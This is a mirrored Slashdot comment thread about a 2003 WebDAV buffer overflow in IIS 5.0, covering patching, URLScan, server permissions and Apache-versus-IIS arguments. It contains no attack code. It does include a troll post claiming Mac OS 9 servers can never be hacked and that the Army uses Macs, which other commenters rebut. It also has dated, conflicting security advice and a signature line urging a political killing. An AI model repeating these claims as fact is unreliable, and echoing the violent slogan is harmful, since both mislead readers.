Slashdot Mirror
WebDAV Buffer Overflow Attack Compromises IIS 5.0
rf0 writes "Well CERT is reporting a new overflow attack for IIS 5.0. Microsoft has released a bulletin. Better download those patches and fix another security hole." According to this CNET story, Microsoft says that this is already being exploited, at the very least since last Wednesday.
(looks at watch) its monday again... time to go patch my IIS
Well duh, "patch my IIS", it's monday isn't it?
Wax-Museum Fire Results In Hundreds Of New Danny DeVito Statues
WebDAV has been a headache for for a long time, until I decided to just disable it altogther. I realized I never had a purpose for it, personally, so I added the disabling registry key too all my servers. If you know any good that WebDAV does, I'd like to know about it.
Th
Hm.. ok.. another day, another Microsoft security hole. I wonder if even half of all Windows users use Windows Update. =P
-------
"In times of universal deceit, telling the truth becomes a revolutionary act."
-- George Orwell
When they get a bug free Windows, they'll have to put some in just so bored /. readers have something to laugh at....
If you're happy and you know it read my blog
I don't know why anyone uses it anymore. I'm switching back to Morse Code. Who's with me?
A buffer overflow allowing an entire system takeover... Why is the code that the web server has access to change allowed to take over the system?
If you listened to the Gartner Group, you stopped using IIS last year.
If you didn't, well, get with the program!
Eventually MSFT will have to deliver your "mission critical" ASP runtime for Apache, and the world will be a better place because of it.
Napster-to-go says "Fill and refill your compatible MP3 player", which is a lie. It's not MP3. It's WMA with DRM.
All of these "patch" issues should be listed and sent to management with a recommediation of switching to a more secure *nix alterntive. When will the truth beat out the Microsoft ad machine?
Cue 2,000 microsoft bashing messages...
Slashdot is not the place you want to read about things like this, if you really need / want to be on the ball. You need to subscribe to bugtraq and nanog. You'd be surprised... it's like knowing the future!
Well, if they are going to have bugs, it is not that bad of a thing as long as they are patched promptly. Then again, many admins do have a tendancy to run unpatched machines.
It looks like this was the exploit used to hack into an Army machine recently. Check out the link from MSNBC here.
Comment removed based on user account deletion
I was ready to uninstall IIS when it occured to me that Exchange 2K needs it. I was ready to uninstall Exchange 2K when I realized users would not be able to function. Whew, luckily I came to my senses...
So is this any kind of standard WebDAV or just a particular proprietary implementation of similar features in IIS?
I've always been curious about this technology. At one point I even heard talk of a "WebDAV filesystem", but haven't heard of it taking off in any big way yet.
"Provided by the management for your protection."
It seems quite likely to me that that was an under-reported version of this incident reported on MSNBC, that permitted an intruder with apparent quite-hostile intent onto US Army sites.
Now, I'm no anti-any OS, I like them all, but what about the latest Sendmail vuln? Or even the one in older versions of BIND? Isn't it true to say that ALL OSes are equally as vulnerable? During the brief time I was on the Redhat Network, I got at least two or three updates a day telling me the sky was about to fall in if I didn't patch my server soon.
I treat all servers fairly, regardless of background, age or reliability :-)
Yes I know my own comment is off topic and I've even switched off my Karma Bonus :)
Rus
Cheap UK and US VPS
It's hardly news is it? It's not like "Oh! Another Microsoft security hole, bug surprise there!" kinda thing. It's like joining the beer a week club and then acting all surpised when you get a beer every week. Oh my! I joined the beer of the week club and I just got a beer! Astounding!
If CERT would just move their headquarters to the IIS devs room in redmond, that would probably save a lot of money for CERT. They should be a part of the regular IIS dev team.
That could count as a really big argument against not disclosing vulnerabilities as soon as possible? I don't know since when Microsoft is aware of this and making the patch, but if it have time to be developed an exploit could had happen enough time yet. If administrators were aware of that problem at least they could have been disabled specially WebDAV, even if they don't have a fix, instead of waiting blindly that someone hacks them.
I was going to make some smart-alek comment about "YET ANOTHER M$ security flaw", and how this entire story should be modded -1, redundant...
But *sigh* no. That's too easy.
Its sad, really. Just sad.
I have some boxen to go exploit.
"We are the music makers, and we are the dreamers of dreams."
It says near the bottom that IIS systems with URL scan which is part of the lockdown utility are not affected by this.
/.'s don't like microsoft and thats sad because microsoft is the driving company behind many many jobs. The arrival of windows pushed the last boom. No questions about that. Unix had been around for 20 yrs and no boom. Windows and the net and look at how things accelerated..why..because ma/pa people use windows..not *nix. Just the facts.
Why would you run a IIS server without using the lockdown utility??
We (large corporation) have been using IIS servers and without a problem. With Lockdown/urlscan there are no problems at all. The logs show people trying to get in but being rejected.
I think this story is a bit overblown. It appears that most
cheers
John
I've asked this everywhere, maybe someone will answer.
... We don't run the default config. We've customized it, as have many shops. I can't find information on _which_ aspects of URLScan provide the protection - I'd like to know if our customizations have left us out in the breeze.
The MS advisory states that a 'default' URLScan will protect against this. Well
Anyone know?
And I thought that Penguin on the Microsoft home page looked at little out of place.
/^[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}$/i
Why would anyone need to download patches for a Microsoft product? I've been getting about 5 in the mail every day lately.
Sheesh, evil *and* a jerk. -- Jade
The exploit has been in the wild since last Wednesday. Microsoft has known about it since that time. Five days to a patch is really good for Microsoft but, the last Apache bug was fixed on the day of discovery, long before any exploits appeared.
I hate liberals. If you are a liberal, do not reply.
I think one critical issue with the timings of patch releases is stated right up there in the post: exploits are already out and about... for 3 days!
I'm not bashing either side because *nix has its security issues, too; but last time I saw an exploit with Linux, there was a patch well before any known exploits. I'm not saying the patches to Linux were made before the bug was made public, just that they were available before the bug was exploited.
If there is some cracker out there that has found this bug, then I'm sure there is a security expert that has also found and reported it. Code Red, IIRC, could've been stopped by a fix available 6 months earlier.
Of course, I'm not in any way a security expert or even amateur, and I'm not a server admin, nor did I RTFA.
IANAL, but I play one on
Does this affect Windows XP Home/Pro in any way? The patch doesn't seem to apply to XP, but does the vulnerability?
At least the noticed that an exploit exists. Sure, it may take a little while to make a patch, but at least there will be a fix soon. Hopefully, this should increase the overall security of IIS, which would of course be a good thing.
Why, you may ask, would it be good for one of Apache's competitors to be less buggy (assuming you are arguing from a pro-open source standpoint)? This gives Apache competition. The more competition it has, the more incentive many of its developers will have to improve it. The quality of webservers will raise slightly.
The improvement of IIS is also a good thing for buisnesses that rely on it because of ASP. Perhaps they wish to move to Apache, but cannot because of their language of choice for development on their webserver. Should they be more vulnerable to hacker attacks, just because of their choice of language? No.
The conflict between Apache and IIS is generally a good thing.
Because of the lack of WebDAV protocol standards, I have never been able to make the redirector capabilities of WinXP work correctly for several supposedly WebDAV-enabled sites. Because of this shortcoming, your SMB-replacement argument also breaks down.
Twelve-and-three-quarter inches. Unyielding. This wand belonged to Bellatrix Lestrange.
I think its ironic that with every remote security hole and exploit, including the few that affect a majority of BSD installations, no one is addressing the fact that there are more secure platforms for webserving. Instead of focusing on the porous unix/linux offerings, or MS weaknesses, such as this recent WebDAV IIS 5.
:
It is a concrete fact that that no MacOS based webserver has ever been hacked into in the history of the internet.
The MacOS running WebStar and other webservers as has never been exploited or defaced, and are are unbreakable based on historical evidence.
In fact in the entire SecurityFocus (BugTraq) database history there has never been a Mac exploited over the internet remotely.
That is why the US Army gave up on MS IIS and got a Mac for a web server.
I am not talking about FreeBSD derived MacOS X (which already had a more than a 32 exploits and potential exploits ) I am talking about current Mac OS 9.x and earlier. Apples Mac OS 9.2.2 is latest and came out rhis last summer. According to Google HTTP requests, Mac OS 9 users outnumber Mac OS X almost 9 to 1. Luckily for them they are all secure.
Why is is hack proof? These reasons
1> No command shell. No shell means no way to hook or intercept the flow of control with many various shell oriented tricks found in Unix or NT. Apple uses an object model for process to process communication that is heavily typed and "pipe-less"
2> No Root user. All Mac developers know their code is always running at root. Nothing is higher (except undocumented microkernel stuff where you pass Gary Davidians birthday into certain registers and make a special call). By always being root there is no false sense of security, and programming is done carefully.
3> Pascal strings. ANSI C Strings are the number one way people exploit Linux and Wintel boxes. The Mac avoids C strings historically in most of all of its OS. In fact even its ROMs originally used Pascal strings. As you know Pascal strings (length prefixed) are faster than C (because they have the length delimiter in the front and do not have to endlessly hunt for NULL), but the side effect is less buffer exploits. Individual 3rd party products may use C stings and bind to ANSI libraries, but many do not. In case you are not aware of what a "pascal string" is, it usually has no null byte terminator.
4> Macs running Webstar have ability to only run CGI placed in correct directory location and correctly file "typed" (not mere file name extension). File types on Macs are not easily settable by users, especially remotely. Apache as you know has had many problems in earlier years preventing wayward execution.
5> Macs never run code ever merely based on how a file is named. ".exe" suffixes mean nothing! For example the file type is 4 characters of user-invisible attributes, along with many other invisible attributes, but these 4 bytes cannot be set by most tool oriented utilities that work with data files. For example file copy utilities preserve launchable file-types, but JPEG MPEG HTML TXT etc oriented tools are physically incapable by design of creating an executable file. The file type is not set to executable for hte hackers needs. In fact its even more secure than that. A mac cannot run a program unless it has TWO files. The second file is an invisible file associated with the data fork file and is called a resource fork. EVERY mac program has a resource fork file containing launch information. It needs to be present. Typically JPEG, HTML, MPEG, TXT, ZIP, C, etc are merely data files and lack resource fork files, and even if the y had them they would lack launch information. but the best part is that mac web programs and server tools do not create files with resource forks usually. TOTAL security.
4> Stack return address positioned in safer location than some intel Osses. Buffer exploits take advantage of loser programmers lack of string length checking and clobber the return address to run
The best way to evaluate this bug is to consider an equivalent attack against competitors. In this case, the main competitor is Apache.
Cracking Apache in this way would not give you root. While you might be able to get root by using some other local exploit, it's not the slam-dunk that it is on Windows.
Furthermore, careful admins can run Apache in a sandbox called a "chroot". Properly set up, this means that the attacker can't get to the rest of the system; all they can play with is the Web site.
So, in summary:
Its all Microsoft's fault. Its crap software.
That's a pretty good assessment. The bug itself is a mistake lots of other people have made, but the severity of the mistake isn't.
It seems open source bugs/ exploits/ vulnerabilities are always conveniently buried somewhere other than on the front page.
Not to say Microsoft software is secure, but hey. "Fair and balanced" never was part of the /. motto.
MSNBC has an interesting article about this attack being used on an Army machine. What's good to note is that the attackers discovered the flaw, NOT security researchers which is the norm.
Its a known fact in many press releases that the US army uses macs as servers and the ones that recently avoided usingh mac got quickly rooted with secret unpublished IIS exploits :
http://www.msnbc.com/news/886524.asp?0dm=C11KT
I doubt the Army will make that mistake again.
Everything in that post was 100% factual, shame on you you anti-security anti-mac bigot.
All seven of them? All long fixed? Page not updated since January 23, 2003? I'd LOVE to send them that. Comparing that to the long and varied string of IIS compromises/failures/destruction would be enough to get even the pointiest headed boss to make the switch. Good idea. Thanks!
I just ran into a problem today on one of our development web servers, trying to get an ASP to run a windows shell script with particular permissions. Anyway, executing arbitrary code in the Local System Context -- this is just the feature that I've been looking for!
"Luck is the residue of design" -- Branch Rickey
Your first three paragraphs were quite good and interesting.
Your fourth is full of idiocy.
I think this story is a bit overblown. Umm, not at all. It is quite a serious incident.
It appears that most /.'s don't like microsoft
Tell me, is this the first time you noticed that? Not much analytical thought going on upstairs, is there?and thats sad because microsoft is the driving company behind many many jobs They suck a very disproportionate chunk of money out of the market, they are in a position where innovation is much too risky, they are in such a controlling position that they are even greatly profitable against the trend of the rest of the market. The IBM PC pushed the boom. DOS and Windows have ridden the wave and placed Microsoft in the position of punishing any software company and they keep expanding -- that becomes too successful in the name of feeding their monstrous appetite. DOS and Windows sucked for many years, but were small and people ignored the control that was being given such an unworthy producer.
They drive their own jobs with lots of marketing and billions to spend on research, which would be much better used in a large market of competing thriving software vendors, like we had before Microsoft used monopolistic business models to destroy them all. If you become successful, Microsoft is guaranteed to take it away from you. That is successful for Microsoft and creation of Microsoft jobs, but far from good for America or the world.
The arrival of windows pushed the last boom. No questions about that. Unix had been around for 20 yrs and no boom. Windows and the net and look at how things accelerated..why..because ma/pa people use windows..not *nix. Just the facts.
You mentioned facts? The boom came on the backs of now-defunct companies who pioneered their fields, such as word processing, networking, compilers, OO Languages, etc. none of which was pioneered by Microsoft. But Microsoft was good at using software ownership to take these things away from their innovators. And now you have come full circle to why many developers are congregated here and do not always hold Microsoft in high regard.
But you knew that, didn't you? Perhaps you are AC because your large company is Microsoft?
Does this explain my weblogs having /ADMIN%24
PROPFIND
in them ?
My SGI doesn't know what ADMIN$ is.
Is there a Micro$oftese font pack for SGI ??? SGI won't speak to me unless I get a service agreement!
www.cgisecurity.com
www.cgisecurity.com/lib/
If you have to use IIS for some reason, put a Squid proxy running on your favorite OS in front of it. It will save you a lot of trouble.
The word "mac" doesnt appear once in the msnbc article.
And in the 5 years I've done contract work at the pentagon, I've yet to see a violet colored iMac or pretentious powerbook.
In short, you are full of shit.
"Eventually MSFT will have to deliver your "mission critical" ASP runtime for Apache, and the world will be a better place because of it."
Why wait for Microsoft when ASP.Net is already being ported?
Instead of wasting money and time plugging every hole in IIS, why just not use Apache or Zope?
Both run on Win32. Both are free. Both are stable. Both are fast. Both are good.
o/t but check out this incredibly intelligent and insightful article on CNN.
File-sharing sites allow trading of porn
WASHINGTON (CNN) -- The same technology used to download music from file-sharing sites makes it possible to trade pornography, tech experts testified at a Capitol Hill hearing Thursday
-----
Who says the government doesnt have my best interests in mind?
My tax dollars at work. Now I can get porn on KaZaa, too.
I don't need no instructions to know how to rock!!!!
WebDAV is more like a VPN. Sure, you COULD set it up poorly and give everybody access to all your documents.
On the other hand, using any number of authentication schemes (including through an LDAP server, behind a firewall), you can lock it down as tightly as you'd like. And yes, it runs over HTTPS as well as HTTP, so even your port 80 crack is laughable.
Or perhaps you think all web-based applications are inherently insecure? (I'd like some evidence to back this one up)
http://www.webstar.com/press/press_releases/pr0914 99.html
.mil sites (even though many pretend to FINGER and respond as non-macs). Simple server sniffing logic based on characterizations detect what OS it REALLY is, but sniffing.mil sends americans to jail.
The mac securtiy post is 100% factual. With the recent root-defacement of http://www.msnbc.com/news/886524.asp?0dm=C11KT It seems the Army will stick with Macs for more of its
Kill 1 Mad Guy (Bu$H) - Save 1 Mio. Lives
The worst spacial incident in recorded history occurred only a few months ago and you people are talking about exploits in IIS yet again?!?! My GOD, people, GET SOME BLOODY PRIORITIES!
Incompetent sysadmins still are the weakest link.
:(
Take a look at the World Health Organization South-East Asia web site:
http://w3.whosea.org/index.htm
They're running IIS 4.0. FOUR.POINT.ZERO.
The deface has been there for almost a day with apparently no fix yet
You know, if people periodically checked Windows Update, this would not be that big of a deal; additionally, if you have SP3 installed you can tell it to automagically install any critical updates for you without prompting. Case solved.
I don't think that's right. It may change the exact number of bytes necessary to smash the stack, but an unchecked buffer is an unchecked buffer.
I'm guessing that the IIS in XP might be vulnerable, but that IIS should only be used for testing on not a live site. Who wants to run a live site on XP Pro when it's limited to 10 connections (and a single web browser will typically open 4 connections)?
URLscan along with the IIS lockdown, keep me from worrying about much of anything. Only a hack to the ASP ISAPI would get me worried. Do I wish that these tools were incorporated into IIS to begin with? Yes, but you can only bitch for so long before you look stupid for not locking it down yourself.
I'm not drunk, I just have a speech impediment. And a stomach virus. And an inner ear infection.
The problem with this patch is that it wasn't found by a white hat and submitted. It was discovered by people getting hacked and calling MS asking WTF. In cases like that, 5 days isn't really that bad. In cases where an exploit, along with vulnerability code, and a description are fed to devs on a platter, open source or not, it makes the task 10x easier. When you have to figure out what is going on while under fire, and in a hurry, things get messy. That said, you can hack a lot of systems in 5 days with the right script.
-Charlie
It's already on WindowsUpdate, so it makes for an easy patch. Just the damned reboot...
:)
But let's not get too smug, there have been a number of open source exploits found lately. They just don't seem to make it to the front page of Slashdot...for some reason.
No, is it mandated under the DOJ settlement. Look at page 193, par. 19, lines 12-13, the 'punishment' section. It clearly states that MS shall, as a result of being found guilty of several very bad things, suffer harsh penalties. Those penalites are putting a penguin on several pages of the site, and forcing a junior VP to apologise to at least 3 random people on the street. That'll learn em.
-Charlie
Sure, another MS exploit. Seems to be one almost every week, and it sucks.
/. chose to post this article, but reject an article I submitted yesterday about a very serious security hole in Opera - Opera describe it as "extremely critical".
/. displaying an unfair bias?
What I do find interesting is that
I'm not griping about having my story rejected, I've had many rejected and a few accepted, and that's the way things are, no problem. What I am questioning is the editorial bias. Here we are at a website which probably has one of the highest concentration of Opera users of any website in the world, and they chose to not post a negative story about "the good guys" (which has exploits in the wild) but did choose to post a negative story about "the bad guys".
Just more of
Read reviews of shopping cart software
Excuse the lame question, but is there _any_ computer language out there that can completely prevent buffer overflows and other common attacks?
This possibly endless, iterative procedure for every_single_program_written out there is getting very tiresome. When is a program totally secure, or better yet, is any program ever secure from any future attacks?
At the least, this certainly isn't the FUTURE of computing (I hope!).
First, our nation is faced with a war within 48 hours, then I pickup the link to a MS patch on Slashdot... What next? Hell freezing over in a week???
Slashdot.. Land of nerds, trolls, and FlameBait..
...yeah.
Let's all laugh, shall we?
Any safe language prevents against buffer overflow attacks, printf-style bugs, heap corruption and double-free bugs. Java or O'Caml or SML would be good choices. SML also protects against integer overflows. SML and O'Caml, for their parts, are only about 20% slower than C and a whole lot more fun to program in.
o m7misc/net/mlftpd/) so I wouldn't need to worry about buffer overflows any more. It was really easy. It blows my mind that all of the security-obsessed unix people are still manually putting in their buffer length (etc.) checks in tortured legacy C code, when they could so easily have a set of daemons that are totally immune to that sort of attack.
I wrote an FTP server in SML (http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/t
Of course, any language that lets you write interesting programs (ie, "telnetd") will also let you write programs with security holes. (In a sense, telnetd is itself a security hole, provided you have the password!) But having the compiler automatically ensure that the largest class is impossible gives you a lot more time to work on other, more subtle security problems.
This post is a lot like the "BSD is dying" troll that's just not going away. Every once in a while some idiot posts it, and a few other idiots moderate it up. Anyway, on to debunking.
The MacOS running WebStar and other webservers as has never been exploited or defaced, and are are unbreakable based on historical evidence.
Really? Is that because it crashed every time someone tried to access it? Considering that MacOS does not even have preemptive multitasking or proper memory protection, it's not that hard to imagine. MacOS has a really nice GUI, but in terms of technology it is behind even Windows 95.
In fact in the entire SecurityFocus (BugTraq) database history there has never been a Mac exploited over the internet remotely.
Hmmm, there are no exploits for DOS either. Are we to conclude that DOS is the most secure OS ever?
No command shell...
BFD! If you gain control of a process (through buffer overflow, for example) and manage to execute your own code, you still have complete control of the system. Heck, the current bug in IIS has nothing to do with exploiting shell.
No Root user.
The troll is only getting better. Ladies and gentlemen, it has come to our attention that the competitors' cars have malfunctioning seatbelts and thus cause injuries to passengers in a collision. Our MacCar has no seatbelts, therefore it is not vulnerable to collisions.
You know, IIS also runs as root (or rather LocalSystem in NT terms). By always running as root there is no false sense of security and programming is done carefully. Doesn't seem to help though...
Pascal strings.... As you know Pascal strings (length prefixed) are faster than C...but the side effect is less buffer exploits
...and they are limited to 255 bytes in length. (For those who did not program in pascal, the first character in the char array represents the length of the string. Since unsigned char's maximum value is 255, that's the maximum length of the string). Anyway, a buffer overflow occurs when you try to write more data than you can fit in the buffer. The only way a compiler could prevent that is if it inserts length checks before every write, and either truncates the string or terminates the program. It's been a loooong time since I touched pascal, so I don't remember how it handles that, but in any case it's irrelevant: is WebStar written in Pascal? In fact, besides some legacy code in MacOS, is anything at all written in Pascal these days?
Macs running Webstar have ability to only run CGI placed in correct directory location and correctly file "typed" (not mere file name extension).
Unix running Apache have ability to only run CGI placed in correct directory location and correctly file "typed" (not mere file name extension). (You can't run some random data).
Macs never run code ever merely based on how a file is named. ".exe" suffixes mean nothing!
Unix never run code ever merely based on how a file is named. ".exe" suffixes mean nothing! (You need to set executable permission first).
but the best part is that mac web programs and server tools do not create files with resource forks usually. TOTAL security.
Yeah, and when I leave the house I put my keys under the rug usually. TOTAL security. I mean who would possibly figure out how to create "resource forks" and such?
Stack return address positioned in safer location than some intel Osses.
That is the property of the hardware, not OS. Do you undestand the distinction?
7> There are less macs, though there are huge cash prizes for cracking into a MacOS based WebStar server (typically over $10,000 US). Less macs means less hacker interest
What happened to 5> and 6>? Were those argument too stupid even by your standards?
Anyway, in this paragraph you are contridicting yourself: on the one hand you are claiming that macs are safer because there is less
___
If you think big enough, you'll never have to do it.
Oh, geez, this was almost a guaranteed +5 with the biased mods in an article like this.
Your first three paragraphs were quite good and interesting.
Your fourth is full of idiocy.
But ALL of yours were dumb! Stupid-head!
Umm, not at all. It is quite a serious incident.
He just explained why it was overblown.
Tell me, is this the first time you noticed that? Not much analytical thought going on upstairs, is there?
This is the point at which I realized YOUR post was the troll. You're ridiculously hostile over the fact that somebody dared breathe a word that an MS vulnerability was overblown.
They suck a very disproportionate chunk of money out of the market, they are in a position where innovation is much too risky, they are in such a controlling position that they are even greatly profitable against the trend of the rest of the market. The IBM PC pushed the boom. DOS and Windows have ridden the wave and placed Microsoft in the position of punishing any software company and they keep expanding -- that becomes too successful in the name of feeding their monstrous appetite. DOS and Windows sucked for many years, but were small and people ignored the control that was being given such an unworthy producer.
I can agree with that paragraph.
You mentioned facts? The boom came on the backs of now-defunct companies who pioneered their fields, such as word processing, networking, compilers, OO Languages, etc. none of which was pioneered by Microsoft. But Microsoft was good at using software ownership to take these things away from their innovators. And now you have come full circle to why many developers are congregated here and do not always hold Microsoft in high regard.
Yeah, the big bad company bought good software from other people to sell. How dare they.
But you knew that, didn't you? Perhaps you are AC because your large company is Microsoft?
Cue standard wild-eyed anti-corporate Slashdot paranoia conspiracy theory.
They'll jump up and down screaming about how many patches IIS needs to remain secure, while not mentioning that Apache has four security patches in the last six months while IIS only has two. And if you remind them of that, they'll scream "It's because open source is better, it allowed the bugs to be found and fixed quicker." Whatever... Keith
Right. You've been getting 5 patches in the mail every day lately.
Sure.
Why is a security bug in the MS webserver news but a similar bug in the Sun webserver is not?
Oh wait, this is Slashdot and Bill Gates is evil...
Hole found in Sun server software
A flaw in Sun Microsystems' Web server software could allow hackers to gain control of Web sites, a security consulting company warned.
This is Slashdot! You think standard logic and calm reasoning exists around here? This is the land of knee-jerk reactions and biased anecdotal holier-than-thou elitism, my friend.
Simply telling people that Windows Update can AUTOMATICALLY download and install updates will cause them to go off into standard EULA rants anyway.
On the other hand, using any number of authentication schemes (including through an LDAP server, behind a firewall), you can lock it down as tightly as you'd like. And yes, it runs over HTTPS as well as HTTP, so even your port 80 crack is laughable.
I dunno...I mean yeah, but the whole point of this sploit is that none of that matters since you have local admin rights on the IIS\Webdav server.
How are you going to not give the local system account of the WebDAV server access rights to the documents you're WebDAVing?
Of course, I still don't know what WebDAV is, but I installed that patch. The threat looks pretty amazingly significant, even without WebDAV's extra features.
In related news, it was confirmed by oceanographic researchers this morning that the Pacific Ocean is wet.
When all you have is a hammer, everything looks like a skull.
Dumping IIS because of a few security holes is really fucking stupid for a ton of reasons that I don't even have time to go into.
****
It's not the holes, it's the policy. IIS runs as LocalSystem by default. ANY breakage in IIS leads to a full system compromise. With Apache, since it runs as it's own user, usually there is very little damage from a compromise. If you fully compromise Apache with normal security settings:
* You still can't modify people's files
* You can't even modify the apache config files
The only exception is that if it is running Active Content, you can do anything that the active content can do. That's problematic, but nowhere near the problems of a full system compromise.
Engineering and the Ultimate
Slightly less equally vulnerable.
Slightly faster.
Slightly more reliable.
Slightly more manageable.
Slightly cheaper.
Slightly less pain.
No, it is clear that *you* don't understand security. Specifically:
Please, get a clue.
/mike
-- "So, what's the deal with Auntie Gerschwitz et all?"
what are chances this is related to http://www.msnbc.com/news/886524.asp?0cv=CB20
army sites being hacked with "disturbing" effectiveness?
from the bulletin :
Who should read this bulletin: Systems administrators running Microsoft ® Windows ® 2000
from the patch download page:
Supported Operating Systems: Windows 2000
Windows 2000 Professional
Windows 2000 Server
Windows 2000 Advanced Server
Internet Information Server 5.0
No XP; No IIS 5.1
The truth doesn't care what I think.
It's not the holes, it's the policy. IIS runs as LocalSystem by default.
So what? You can run IIS under any user. Also, NTFS has very granular file level permissions. It's no less secure than Apache. Default settings do not have a whole hell of a lot of bearing on the quality of an app in my book. That's why they're settings... they can be changed.
As is the journal entry it links to.
You spent 3 months developing something on a completely different platform and then are surprised when it doesn't work on the target platform? Next time, why don't you do a little research before you buy into the "write once, run anywhere" hype?
Christ. No wonder it's so hard to get a job in IT nowadays, idiots like you somehow get all the jobs!
Fun reply, thanks.
Feel free to elaborate. Defend your points, and I'd be happy to explain.
While this makes the front page so we can all have our obligatory cracks at Microsoft, a similar (and just as important!) remote root exploit in Samba was just fixed today.
NO CARRIER
I thought it was. It's been a long time since I've installed it, but I remember the confusion when XP came out because IIS wasn't there after install.
The truth doesn't care what I think.
Since when is a serious IIS security issue news? How do we mod the story as flamebait?
* WebDAV is *nothing* like a VPN.
A VPN has end to end encryption that is what makes it secure. Does WebDAV have end to end encryption?
* "using any number of authentication schemes" does not "lock down" anything at all.
If your security depends on authentication schemes you are hosed. You have to have authentication but you also have to have a whole slew of other measures. Which WebDAV does not.
* It doesn't matter if you are running it over HTTP or HTTPS. Both are the wrong protocol to use for filesharing. Just like using SOAP over HTTP(S).
This is because if you are using 80 or 443 then there is no way to control or shut down the file sharing without also shutting down web access. This is a *bad* thing. Also it makes firewall logs useless.
* Web applications are irrevalent to network security.
Your network has to be secure and have a good security policy and then web apps should be made to work within that framework rather than skirt it.
I want to kill whoever redefined "firewall friendly" to mean "tunnels through 80"
Cypherpunks: Civil Liberty Through Complex Mathematics. Those who live by the sword die by the arrow.
Um...before you get all cocky and make an ass out of yourself for stating uninformed SHIT yourself, check out:w w.army .mil
http://uptime.netcraft.com/up/graph/?host=w
So much for your credibility.
http://uptime.netcraft.com/up/graph/?host=www.army .mil :)
Damn space.
Sure, I can't wait to hear it...
- WebDAV is *nothing* like a VPN.
A VPN provides secure access to a remote network via one or more untrusted networks, typically the Internet. Once a VPN is established, the local endpoint has access to the remote networks's resources including, but not limited to, file, mail, directory, print and web servers. Existing protocols such as IMAP, POP, HTTP, LDAP, NFS and SMB can be used over the VPN in a mostly secure and transaprent manner.
WebDAV is an extension to HTTP - The Hypertext Transport Protocol. HTTP is deisgned to transport hypertext (hence it's name) and other media over via TCP. WebDAV provides distributed authoring and publishing extensions to HTTP to allow, amongst other things, remote collaboration. Using WebDAV for a network file system is akin to using FTP for the same. It is a bad idea.
=> WebDAV is nothing like a VPN.
- "using any number of authentication schemes" does not "lock down" anything at all.
- It doesn't matter if you are running it over HTTP or HTTPS. Both are the wrong protocol to use for filesharing. Just like using SOAP over HTTP(S).
Doing everything via HTTP, whether running plain text over port 80, encrypted over port 443 or any other combination is bad practice. One of SOAP's (and WebDAV's) "features" is that it allows you to do stuff over HTTP that would usually otherwise be blocked by a firewall. Want to do RPC? Sure! Just tunnel it through port 80! Want to do file sharing? Sure! Just tunnel it through port 80! This is seriously screwed up. It defeats a primary purpose for which firewalls were invented in the first place; to limit access to dangerous services. Not to mention that using HTTP for everything is a serious architectural design flaw as well.
Putting authentication in front of HTTP and/or tunneling it over SSL does not fix these problems. This IIS exploit du-jour is a perfect example of such.
- Web applications are irrevalent to network security.
A web application should be well designed and implemented, with security in mind. It should be deployed on a network which is properly secured. It should be running on systems which are properly securied. Making a web application secure does not make a network secure (and vice versa). "Irrelevant" is probably a too strong a word, but the security of a network should never be dependent on the security of a web application.
/mike
-- "So, what's the deal with Auntie Gerschwitz et all?"
Misread the headline as 'WebDAV: Buffy Overcome and Attacks Consumer IIS 5.0'
Would have made for a much more interesting story anyway.
Blame whoever decided that all firewalls must block all traffic that's not HTTP and e-mail.
I'm so glad that Samba security hole - with exploit - was posted off the main page, so we had more room for this.
In your enthusiasm to slam Microsoft, I get a Really Good Feel for when a patch is critical or not. It lets me ignore the servers until a front page Slashdot article shows up.
So, Danke!
"Draco dormiens nunquam titillandus."
Most discovery to patch timelines go like this:
[researcher finds vulnerability]->[notifys vendor]->[waits impatiently for a month or so]->[vendor releases patch in hotfix or service pack]
This case was completly different and demonstrates a disturbing trend in security research. NO ONE knew about this until it was discovered in the wild. Usually the script kiddies find out about the flaw the same day customers do and then it's an arms race to patch. This time the kids were armed with the exploit before even Microsoft knew about it. The trend of exploits staying secret has started to rear it's ugly head and this is the first major case where it's happened. Don't be suprised if this starts happening more and more. The good news is that MS was able to cough up a patch in a matter of days. The bad is that black hats are obviously keeping secrets about flaws they find.
Gone are the days where each vulnerability found was shouted from the rooftops till someone noticed the researcher. Now they just root servers with unfettered access until someone figures out that it's a new vulnerability. EG they bypass all IDS and in this case most firewalls.
For the record, it seems like this is a simple buffer overflow (when will they learn?) so tools like URLScan and SecureIIS stop these attacks. If your running an IIS server it would be a REALLY good idea to invest into either of these. Since they both stop all forms of buffer overflows (and various other types of attack) they don't require a patch to fend off these types of attacks.
So... you think you shouldn't be dumping it just for breaching standards, being slow, sucking resources and Being Written By Microsoft With Malice Aforethought?
I personally don't think you should be dumping it because of a few security holes, I think you should be dumping it for having lots of security holes.
Got time? Spend some of it coding or testing
"You can run IIS under any user."
Reference to where this is a supported configuration?
It would break WebDAV (see subject) for sure.
Used to do some neat stuff with WebDav, it it's still around
Vote Quimby!
If your site is not blindly prejudice against Windows I would expect this article to appear on your site some time. Its a buffer overflow. It also says you are crazy to enable Samba on a box attached to the Internet. You are also crazy not to use the IIS lockdown tool that stops Windows buffer overflows. I prefer Windows because I can make amazing software on that OS and I cannot do much more than 'hello word' on a Linux system. Article: "Linux firms look to plug Samba hole: The open-source community is pushing customers to patch their systems to close a hole in a software component that allows Windows programs to store and retrieve files on Linux and Unix servers." http://www.zdnet.com.au/newstech/os/story/0,200002 4997,20272953,00.htm
It's no less secure than Apache.
HAHAHAHAHAHAHAHA!
Napster-to-go says "Fill and refill your compatible MP3 player", which is a lie. It's not MP3. It's WMA with DRM.
The Samba issue was posted a couple of days ago...
3 /0 3/15/181253&mode=thread&tid=172&tid=14 8
http://developers.slashdot.org/article.pl?sid=0
Comment removed based on user account deletion
As one of those who configure their firewall to only allow specific traffic through, I'd say the 25,000 packets it blocked in the past week indicates a lot of traffic I'm glad didn't get through to my network.
And, if one of my users can prove the need for and security of an application having access from/to the internet, it takes less than a minute for me to allow access to that port and address.
I think it's really time for me
to convince my boss to switch for Apache!
I mean being pro-MS/IIS whatever,
doesn't make sense. Why the hell,
people use IIS when Apache for Windows is freaking stable like rock.
Oh I see, they are too dumb to double-click download, go through a Wizard and install Apache.
hmmm.
Just change the user the service runs under.
Gee, if it was that simple, I wonder why MS isn't telling everyone to do it.
Want to do RPC? Sure! Just tunnel it through port 80!
Well, SOAP is designed to allow applications to have access to the kind of context-full information humans would have access to through the web anyway.
You're not sending anything that wouldn't have been sent anyway.
Take the Google webservice as an example. You can make RPC calls to Google over port 80 -- but it's not much different from a human doing a manual Google search from a browser.
Err, no.
